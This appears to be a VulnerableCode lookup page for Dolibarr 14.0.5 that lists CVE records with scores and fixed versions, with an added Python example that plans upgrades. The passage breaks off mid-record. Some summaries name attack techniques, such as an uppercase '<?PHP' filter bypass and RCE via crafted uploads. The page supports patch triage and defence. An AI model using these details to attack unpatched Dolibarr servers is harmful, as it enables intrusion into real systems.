Look up vulnerable packages by Package URL.

Purl pkg:composer/dolibarr/dolibarr@14.0.5
Type composer
Namespace dolibarr
Name dolibarr
Version 14.0.5
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version null
Latest_non_vulnerable_version null
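The lookup returns the package split into its Package URL components, plus one record per vulnerability whose fixed_packages entries carry their own is_vulnerable flag (15.0.0 fixes CVE-2022-0414 but is itself still affected by 25 other records), while next_non_vulnerable_version and latest_non_vulnerable_version are null. The Python below is an added example, not code from this page or from VulnerableCode: it parses a Package URL into the same Type/Namespace/Name/Version/Qualifiers/Subpath fields, then uses records hand-copied from this page (VCID, CVE alias, CVSS v3.1 base score, latest EPSS probability, fixed versions with their is_vulnerable flag) to derive an upgrade target and a patch order. Two assumptions are labelled in the code: versions are plain dotted numerics, and a fix recorded for version X persists in every later version.

```python
"""Parse a Package URL and plan an upgrade from a VulnerableCode package lookup.

Added example, not VulnerableCode's own code. The vulnerability records below are
constructed by hand from the fields shown on this page; version ordering assumes
plain dotted-numeric versions (true for Dolibarr, not for every Composer package).
"""
from urllib.parse import unquote


def parse_purl(purl: str) -> dict:
    """Split pkg:type/namespace/name@version?qualifiers#subpath into its parts,
    the same breakdown the lookup shows as Type/Namespace/Name/Version/Qualifiers/Subpath."""
    if not purl.startswith("pkg:"):
        raise ValueError(f"not a Package URL: {purl!r}")
    rest = purl[len("pkg:"):].lstrip("/")
    subpath = None
    if "#" in rest:  # subpath follows the last '#'; drop empty, '.' and '..' segments
        rest, raw = rest.rsplit("#", 1)
        segments = [unquote(s) for s in raw.strip("/").split("/") if s not in ("", ".", "..")]
        subpath = "/".join(segments) or None
    qualifiers = {}
    if "?" in rest:  # qualifiers follow the last '?'; keys are case-insensitive
        rest, query = rest.rsplit("?", 1)
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            if value:  # a qualifier with an empty value is discarded
                qualifiers[key.lower()] = unquote(value)
    version = None
    if "@" in rest:  # version follows the last '@'
        rest, version = rest.rsplit("@", 1)
        version = unquote(version)
    segments = rest.split("/")
    if len(segments) < 2 or not segments[0] or not segments[-1]:
        raise ValueError(f"Package URL needs at least a type and a name: {purl!r}")
    return {
        "type": segments[0].lower(),
        "namespace": "/".join(unquote(s) for s in segments[1:-1] if s) or None,
        "name": unquote(segments[-1]),
        "version": version,
        "qualifiers": qualifiers,
        "subpath": subpath,
    }


def version_key(version: str) -> tuple:
    """Order plain dotted-numeric versions (assumption: no suffixes such as -beta)."""
    return tuple(int(part) for part in version.split("."))


# Constructed from the records on this page: VCID, CVE alias, CVSS v3.1 base score, latest
# EPSS probability, and each fixed package's version with its own is_vulnerable flag.
VULNS = [
    {"id": "VCID-1225-a2a6-bkan", "cve": "CVE-2023-38888", "cvss": 9.6, "epss": 0.05006, "fixed": [("17.0.1", False)]},
    {"id": "VCID-1uje-n8xc-y7b7", "cve": "CVE-2023-30253", "cvss": 8.8, "epss": 0.89175, "fixed": [("17.0.1", False)]},
    {"id": "VCID-3cg6-pnf4-jkc1", "cve": "CVE-2022-0414", "cvss": 4.3, "epss": 0.00326, "fixed": [("15.0.0", True), ("16.0.0", True)]},
    {"id": "VCID-3xdg-az5a-dyft", "cve": "CVE-2024-34051", "cvss": 4.6, "epss": 0.00966, "fixed": [("19.0.2", False)]},
    {"id": "VCID-4c2v-phxx-y3h8", "cve": "CVE-2024-31503", "cvss": 7.5, "epss": 0.00057, "fixed": []},
    {"id": "VCID-6drz-jsq4-wyhd", "cve": "CVE-2024-37821", "cvss": 8.8, "epss": 0.00234, "fixed": [("19.0.2", False)]},
    {"id": "VCID-7ku4-fwqc-33ba", "cve": "CVE-2025-56588", "cvss": 8.8, "epss": 0.00239, "fixed": [("21.0.3", False)]},
    {"id": "VCID-7qjh-teat-tqav", "cve": "CVE-2022-0819", "cvss": 8.8, "epss": 0.01735, "fixed": [("15.0.1", True)]},
    {"id": "VCID-8fjr-6hdm-vqdd", "cve": "CVE-2026-31019", "cvss": 8.8, "epss": 0.00119, "fixed": []},
    {"id": "VCID-d4uk-4adf-mba9", "cve": "CVE-2023-4198", "cvss": 6.5, "epss": 0.00079, "fixed": [("18.0.0", False)]},
]


def upgrade_target(vulns: list) -> tuple:
    """Pick the lowest version that VulnerableCode does not itself flag as vulnerable and that
    sits at or above a recorded fix for as many listed vulnerabilities as possible.
    Assumes a fix persists in every later version. Returns (version, [ids left unresolved])."""
    candidates = {ver for v in vulns for ver, vulnerable in v["fixed"] if not vulnerable}
    if not candidates:
        return None, [v["id"] for v in vulns]

    def unresolved(candidate: str) -> list:
        return [v["id"] for v in vulns
                if not any(version_key(ver) <= version_key(candidate) for ver, _ in v["fixed"])]

    best = min(candidates, key=lambda c: (len(unresolved(c)), version_key(c)))
    return best, unresolved(best)


def prioritize(vulns: list) -> list:
    """Order by exploitation likelihood (EPSS) first, then CVSS, for patch-window triage."""
    return [v["id"] for v in sorted(vulns, key=lambda v: (v["epss"], v["cvss"]), reverse=True)]


if __name__ == "__main__":
    print(parse_purl("pkg:composer/dolibarr/dolibarr@14.0.5"))
    target, left = upgrade_target(VULNS)
    print("upgrade to", target, "still open:", left)
    print("patch first:", prioritize(VULNS)[:3])
```

On these records the planner selects 21.0.3 and leaves VCID-4c2v-phxx-y3h8 and VCID-8fjr-6hdm-vqdd open, because their fixed_packages lists on this page are empty. That is the caveat to carry into a remediation ticket: is_vulnerable false on a fixed package only says the database holds no record for that version, and the CVE-2026-31019 summary itself states that 22.0.4 and below are affected, so 21.0.3 is not clean even though no entry on this page flags it. CVE-2023-30253 sorts first because its EPSS (0.89) dwarfs the CVSS 9.6 record's 0.05.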
Affected_by_vulnerabilities
0
url VCID-1225-a2a6-bkan
vulnerability_id VCID-1225-a2a6-bkan
summary
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/
url http://dolibarr.com
1
reference_url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/
url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-38888
reference_id
reference_type
scores
0
value 0.05006
scoring_system epss
scoring_elements 0.89903
published_at 2026-06-07T12:55:00Z
1
value 0.05006
scoring_system epss
scoring_elements 0.89906
published_at 2026-06-05T12:55:00Z
2
value 0.05006
scoring_system epss
scoring_elements 0.89907
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-38888
3
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-38888
reference_id CVE-2023-38888
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-38888
5
reference_url https://github.com/advisories/GHSA-62wf-h26v-5m57
reference_id GHSA-62wf-h26v-5m57
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-62wf-h26v-5m57
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-38888, GHSA-62wf-h26v-5m57
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1225-a2a6-bkan
1
url VCID-1uje-n8xc-y7b7
vulnerability_id VCID-1uje-n8xc-y7b7
summary
Dolibarr vulnerable to remote code execution via uppercase manipulation
Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-30253
reference_id
reference_type
scores
0
value 0.89175
scoring_system epss
scoring_elements 0.99553
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-30253
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/
url https://github.com/Dolibarr/dolibarr
2
reference_url https://www.swascan.com/blog
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.swascan.com/blog
3
reference_url https://www.swascan.com/security-advisory-dolibarr-17-0-0
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.swascan.com/security-advisory-dolibarr-17-0-0
4
reference_url https://www.swascan.com/blog/
reference_id blog
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/
url https://www.swascan.com/blog/
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-30253
reference_id CVE-2023-30253
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-30253
6
reference_url https://github.com/advisories/GHSA-9wqr-5jp4-mjmh
reference_id GHSA-9wqr-5jp4-mjmh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9wqr-5jp4-mjmh
7
reference_url https://www.swascan.com/security-advisory-dolibarr-17-0-0/
reference_id security-advisory-dolibarr-17-0-0
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/
url https://www.swascan.com/security-advisory-dolibarr-17-0-0/
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-30253, GHSA-9wqr-5jp4-mjmh
risk_score 10.0
exploitability 2.0
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1uje-n8xc-y7b7
2
url VCID-3cg6-pnf4-jkc1
vulnerability_id VCID-3cg6-pnf4-jkc1
summary Business Logic Errors in Packagist dolibarr/dolibarr
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0414
reference_id
reference_type
scores
0
value 0.00326
scoring_system epss
scoring_elements 0.55861
published_at 2026-06-04T12:55:00Z
1
value 0.00326
scoring_system epss
scoring_elements 0.5591
published_at 2026-06-07T12:55:00Z
2
value 0.00326
scoring_system epss
scoring_elements 0.55923
published_at 2026-06-06T12:55:00Z
3
value 0.00326
scoring_system epss
scoring_elements 0.55917
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0414
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684
3
reference_url https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0414
reference_id CVE-2022-0414
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0414
5
reference_url https://github.com/advisories/GHSA-f768-8pvq-mm6r
reference_id GHSA-f768-8pvq-mm6r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f768-8pvq-mm6r
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
1
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-0414, GHSA-f768-8pvq-mm6r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3cg6-pnf4-jkc1
3
url VCID-3xdg-az5a-dyft
vulnerability_id VCID-3xdg-az5a-dyft
summary
Reflected Cross-Site Scripting (XSS) in Dolibarr
A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-34051
reference_id
reference_type
scores
0
value 0.00966
scoring_system epss
scoring_elements 0.76942
published_at 2026-06-05T12:55:00Z
1
value 0.00966
scoring_system epss
scoring_elements 0.76939
published_at 2026-06-07T12:55:00Z
2
value 0.00966
scoring_system epss
scoring_elements 0.76951
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-34051
1
reference_url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402
4
reference_url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/
reference_id 2024-004-cve-2024-34051
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-20T15:43:14Z/
url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-34051
reference_id CVE-2024-34051
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-34051
6
reference_url https://github.com/advisories/GHSA-hv2j-6654-x74q
reference_id GHSA-hv2j-6654-x74q
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hv2j-6654-x74q
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@19.0.2
purl pkg:composer/dolibarr/dolibarr@19.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2
aliases CVE-2024-34051, GHSA-hv2j-6654-x74q
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3xdg-az5a-dyft
4
url VCID-4c2v-phxx-y3h8
vulnerability_id VCID-4c2v-phxx-y3h8
summary
Dolibarr vulnerable to Cross-Site Request Forgery
Incorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-31503
reference_id
reference_type
scores
0
value 0.00057
scoring_system epss
scoring_elements 0.18126
published_at 2026-06-07T12:55:00Z
1
value 0.00057
scoring_system epss
scoring_elements 0.18164
published_at 2026-06-06T12:55:00Z
2
value 0.00057
scoring_system epss
scoring_elements 0.18162
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-31503
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-31503
reference_id CVE-2024-31503
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-31503
3
reference_url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md
reference_id CVE-2024-31503.MD
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-08-19T20:05:15Z/
url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md
4
reference_url https://github.com/advisories/GHSA-6ppg-rgrg-f573
reference_id GHSA-6ppg-rgrg-f573
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6ppg-rgrg-f573
fixed_packages
aliases CVE-2024-31503, GHSA-6ppg-rgrg-f573
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4c2v-phxx-y3h8
5
url VCID-6drz-jsq4-wyhd
vulnerability_id VCID-6drz-jsq4-wyhd
summary
Dolibarr arbitrary file upload vulnerability
An arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL file.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-37821
reference_id
reference_type
scores
0
value 0.00234
scoring_system epss
scoring_elements 0.46422
published_at 2026-06-07T12:55:00Z
1
value 0.00234
scoring_system epss
scoring_elements 0.46441
published_at 2026-06-05T12:55:00Z
2
value 0.00234
scoring_system epss
scoring_elements 0.46442
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-37821
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-37821
reference_id CVE-2024-37821
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-37821
4
reference_url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md
reference_id CVE-2024-37821.MD
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/
url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md
5
reference_url https://github.com/advisories/GHSA-p7r8-7w87-8g46
reference_id GHSA-p7r8-7w87-8g46
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p7r8-7w87-8g46
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@19.0.2
purl pkg:composer/dolibarr/dolibarr@19.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2
aliases CVE-2024-37821, GHSA-p7r8-7w87-8g46
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6drz-jsq4-wyhd
6
url VCID-7ku4-fwqc-33ba
vulnerability_id VCID-7ku4-fwqc-33ba
summary
Dolibarr vulnerable to RCE via the computed field parameter
Dolibarr ERP & CRM v21.0.1 were discovered to contain a remote code execution (RCE) vulnerability in the User module configuration via the computed field parameter.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-56588
reference_id
reference_type
scores
0
value 0.00218
scoring_system epss
scoring_elements 0.44428
published_at 2026-06-05T12:55:00Z
1
value 0.00239
scoring_system epss
scoring_elements 0.4719
published_at 2026-06-06T12:55:00Z
2
value 0.00239
scoring_system epss
scoring_elements 0.47172
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-56588
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86
4
reference_url https://github.com/PhDg1410/Research
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/
url https://github.com/PhDg1410/Research
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-56588
reference_id CVE-2025-56588
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-56588
6
reference_url https://github.com/advisories/GHSA-27hj-48r9-x2vx
reference_id GHSA-27hj-48r9-x2vx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-27hj-48r9-x2vx
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@21.0.3
purl pkg:composer/dolibarr/dolibarr@21.0.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@21.0.3
aliases CVE-2025-56588, GHSA-27hj-48r9-x2vx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7ku4-fwqc-33ba
7
url VCID-7qjh-teat-tqav
vulnerability_id VCID-7qjh-teat-tqav
summary
Code injection in dolibarr/dolibarr
Code Injection in GitHub repository dolibarr/dolibarr prior to 15.0.1.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0819
reference_id
reference_type
scores
0
value 0.01735
